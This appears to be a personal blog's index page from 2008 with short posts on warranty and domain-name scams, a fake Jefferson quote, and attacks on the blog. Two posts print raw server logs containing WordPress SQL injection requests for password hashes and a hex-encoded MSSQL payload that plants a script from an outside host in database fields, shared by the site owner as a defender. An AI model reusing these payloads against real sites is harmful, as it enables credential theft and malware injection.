Great Atlantic Warranty now North American Warranty Solutions?

Great Atlantic Warranty, the car warranty scammers, has apparently put on a disguise to try to throw search engines off its track. According to this post GAW is now working under the name North American Warranty Solutions. The domain has been active for all of three months. Great Atlantic Warranty’s former website is now a hand-coded page, and (surprise, surprise) it says GAW is out of business!

Great Atlantic Warranty, as a selling agent, has stopped selling new vehicle service contracts. Great Atlantic Warranty has submitted all contract information to the respective warranty plan administrators.
Who do I call if I have a claim?
If you have purchased a contract, please refer to the cover letter you received with your contract, or the actual contract, for the appropriate customer service contact information. If you cannot locate this information, but you have your contract # or Owner ID #, please click on “I have a Contract Number” below.

> I have a contract number.

If there was no reason to be suspicious before, there is now. Can’t say I’m surprised, though.

The good news is that the net is quickly closing around this clown. The gig is up. As Einstein once said, “you can run, but you can’t hide!”

Or was it Thomas Jefferson? I never know.

Slashdotted!

I got back from the James Taylor show to find MT.Net has been Slashdotted. Seems my Caller ID sleuthing in relation to Automotive Warranty Solutions caught someone’s attention.

I also see that I’m missing out on some big money. According to the NC Attorney General’s office, these warranty calls could be worth $500 to $5000 apiece! That’s some serious change in this down economy. Even better, I could invest that money in a lot more SIP phone numbers with which to snare even more fines. And I wouldn’t have to lift a finger to collect (well, I would have to show up for court, but I could earn potentially +$25k for each court case).

Hmm. Passive income paid by scammers … what am I waiting for?

AsiaDNR and the domain name scam

The same domain name scam as the one I mentioned previously is still happening. This morning I got an email at $WORK from a company called AsiaDNR. An email from steven@scdomain.org tried to say all of $WORK’s Asia domain names were being registered:

Dear CEO,

We are the domain name registration organization in HongKong, which is the domain name registrar centre in Asia. We have something important need to confirm with your company.

we formally received an application on October 19 2008.One company who called Carnelian Investment Company are applying for following:

Domain Names:
$WORK.kr
$WORK.jp
$WORK.my
$WORK.ph
$WORK.net.cn
$WORK.org.cn
$WORK.com.hk
$WORK.com.tw

Internet Brand Name:
$WORK

These days we are dealing with it, After our initial examination, we found that the internet brand name and domain names applied for registration are as same as your company’s name and trademark. hope to get the affirmation of your company because that may relate to your intellectual property on internet. Now we have not finished the registration of Carnelian Investment Company yet, in order to deal with this issue better, please let someone who is responsible for trademark or domain name contact me as soon as possible.

Best Regards,

Steven
————————————————————————————————————————

Domain Name Auditing and Registration Manager.
Hong Kong Office:
Tel:00852 9566 0103
00852 9566 0205

Fax:00852-82261055
Email:steven@scdomain.org

Website: http://www.domaininasia.com
————————————————————————————————————————
————————————————————————————————————————
Confidentiality Notice. This is a letter for confirmation. If the mentioned third party is your business partner or distributor in ASIA please DO NOT reply. We will automatically confirm application from your business partner after this audit procedure. we have to notify you, and our registration organization are not responsible for any dispute questions about trade mark, intellectual property nor patent after they succeed in registration.hope you can understand.thank you.

Be forewarned: if you take them up on their “offer,” you’ll be buying and endless number of domain names!

For the sake of the search engines, here’s a list of fake company names used in the scam that I’ve been able to track down (humans might want to just quit reading here):
Continue reading →

John Drescher is an idiot

The N&O’s new editor John Drescher is an idiot. In today’s column, he labels both Dole and Hagan as “dodgers,” claiming Dole and Hagan sidestepped important issues.

Drescher claims Dole dodged the whole Outlying Landing Field issue until the rest of the state had made up its mind.

That’s absolutely true. Dole was asleep at the switch.

Drescher also claims Hagan dodged whether she would support the recent bailout bill.

That’s a whopper, Johnny.
Continue reading →

The case of the pilfered pumpkin

I woke up to find one of our three foam pumpkin decorations had wandered off from the steps of our porch. Looking around I didn’t see any obvious place it could’ve rolled. It was just gone!

I stood there scratching my head, fuming that some neighborhood miscreant would walk off with my fake, two-dollar pumpkin. Then my neighbor walked by with her dog.
Continue reading →

More webserver attacks

Just logged a few of these. Seems this attack has been discussed online before, but surprisingly there’s little information on it.

Note the attempt to get the user passwords from the wp_users table:

216.83.63.254 – – [03/Oct/2008:14:30:38 -0400] “GET /xmlrpc.php HTTP/1.1” 200 42
“-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:39 -0400] “POST /xmlrpc.php HTTP/1.1” 403 9
70 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:47 -0400] “POST /wp-trackback.php?tb_id=1 H
TTP/1.1” 403 984 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:54 -0400] “GET /index.php?cat=%2527+UNION+S
ELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+i
d=1/* HTTP/1.1” 403 295 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:55 -0400] “GET /index.php?cat=999+UNION+SEL
ECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FRO
M+wp_users+where+id=1/* HTTP/1.1” 403 295 “-” “Mozilla/4.0 (k1b compatible; rss
6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:55 -0400] “GET /wp-trackback.php?p=1 HTTP/1
.1” 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

Jefferson’s bogus bank quote in the wild

I did a periodicals search through N.C. Live (thanks, N.C. General Assembly and Wake County Public Library!) for the bogus Jefferson quote. Got three hits on the “America’s Newspapers” search.

It appeared in the Chicago Sun-Times in 1992:

Return power to the people
Chicago Sun-Times – April 7, 1992
Author: Edward F. Mrkvicka Jr.
Article I, Section 8, Clause 5 of the Constitution states, “The Congress shall have Power . . . To coin Money, regulate the Value thereof, and of foreign Coin, and fix the Standards of Weights and Measures.”

In 1913, Congress passed the Federal Reserve Act, which, in seeming violation of Article I, gave the power to regulate money to a handful of unelected private bankers.

[…]

America, while not the economic power it once was, is still the richest nation in the world. Yet average Americans have virtually none of the wealth. Thomas Jefferson was prophetic when he stated, “If the American people ever allow private banks to control the issue of their currency, first by inflation and then by deflation, the banks and the corporations that will grow up around them will deprive the people of all property until their children will wake up homeless on the continent their fathers conquered .”

Continue reading →

Blog SQL injection attack

I’ve been logging a few attacks on my blog site which put the following into the logfiles:

163.19.104.88 – – [02/Oct/2008:05:57:15 -0400] “GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1” 200 42469 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)”

Turns out its a SQL injection attack which is allegedly being carried out by a criminal gang called Rock Phish (or its being carried out by two teenagers pretending to be a “gang”). The attack uses WAITFOR DELAY to see if it worked or not. The user agent and IP addresses change for each attack, so one has to be clever in defending against it. I’ve been blocking the IP when it comes up, but that becomes impractical after a while.
Continue reading →

Tracing the bogus Thomas Jefferson bank quote

As mentioned in the previous post, a quote attributed to Thomas Jefferson is being bandied about now that the bank bailout is in the news. The quote is:

â€œI believe that banking institutions are more dangerous to our liberties than standing armies. If the American people ever allow private banks to control the issue of their currency, first by inflation, then by deflation, the banks and corporations that will grow up around [the banks] will deprive the people of all property until their children wake-up homeless on the continent their fathers conquered.â€ – Thomas Jefferson to Albert Gallatin, 1802

I thought the quote was fishy-sounding, so I did some Googling tonight to find where it came from. The first step was to search on a unique snippet of the quote. Out of 220 Google results on “continent their fathers conquered” I found a slew of results from this year (and especially last month), but many without listed dates. How far back could I trace it?
Continue reading →

Bogus Thomas Jefferson quote

I found this quote supposedly by Thomas Jefferson floating around the Internet:

“I believe that banking institutions are more dangerous to our liberties than standing armies. If the American people ever allow private banks to control the issue of their currency, first by inflation, then by deflation, the banks and corporations that will grow up around [the banks] will deprive the people of all property until their children wake-up homeless on the continent their fathers conquered.” – Thomas Jefferson to Albert Gallatin, 1802

While a bit poetic, I think the quote is fabricated. The folks at Snopes think its bogus. It also doesn’t appear on UVa’s Thomas Jefferson Quotation Page.

Just like the Einstein Bee quote, someone used Jefferson’s stature to prop up their modern-day argument. Continue reading →